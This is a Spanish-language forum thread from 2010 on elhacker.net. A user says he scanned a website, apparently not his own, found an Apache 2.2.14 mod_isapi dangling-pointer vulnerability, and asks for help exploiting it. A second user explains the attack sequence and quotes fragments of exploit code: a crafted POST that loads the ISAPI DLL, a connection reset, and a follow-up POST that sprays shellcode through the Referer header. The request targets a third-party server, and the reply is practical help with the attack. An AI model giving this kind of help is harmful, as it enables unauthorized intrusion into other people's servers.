Foro de elhacker.net

Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: Pabloxxx en 11 Octubre 2010, 08:23 am



Título: Ayuda Apache 2.2.14 mod_isapi Dangling Pointer
Publicado por: Pabloxxx en 11 Octubre 2010, 08:23 am
hola.. hoy scanee una pagina web y salto esa vulnerabilidad.. es bastante nuevo el bug este.. si alguien como sabe explotarlo por favor que me ayude..

Saludos


Título: Re: Ayuda Apache 2.2.14 mod_isapi Dangling Pointer
Publicado por: Pabloxxx en 11 Octubre 2010, 22:25 pm
hola... nadie sabe nada? hay un video exxplicativo en una web.. pero no alcanzo a entender bien.. por favor que alguien me de una manitoo...

aca les dejo la web que lo explica http://www.senseofsecurity.com.au/advisories/SOS-10-002

Saludos


Título: Re: Ayuda Apache 2.2.14 mod_isapi Dangling Pointer
Publicado por: Ivanchuk en 12 Octubre 2010, 18:53 pm
Hola pablo,

Creo que es bastante claro, te explica por todos lados como funciona. Se conecta al server y manda un http-post para hacer que cargue la dll isapi (mod_isapi).
Código:
    triggerVuln = "POST /cgi-bin/" + isapiDLL + " HTTP/1.0\r\n"
        "User-Agent: AAAAAAAA\r\n"
        "Pragma: no-cache\r\n"
        "Proxy-Connection: Keep-Alive\r\n"
        "Host: " + serverIP + "\r\n"
        "Content-Length: 40334\r\n\r\n" +
        string(footer);

Despues paquete reset. Y ahi esta la vulnerabilidad, apache va a descargar la libreria isapi pero quedan referencias al modulo todavia disponibles.
Despues de esto para aprovecharse de esas referencias manda otro http-post pidiendo uso de la libreria descargada

Código:
    payload = "POST /cgi-bin/" + isapiDLL + " HTTP/1.0\r\n"
        "Accept: " + string(accept) + "\r\n"
        "Referer: " + string(referer) + string(shellcode) + "\r\n"
...

En el pedido hace una onda de spray shellcode para tener mas posibilidades de que sea ejecutada. No lo probe, pero es posible que sea una loteria. La shellcode me parece que esta hardcodeada, capaz que tengas que cambiarla.

Saludos.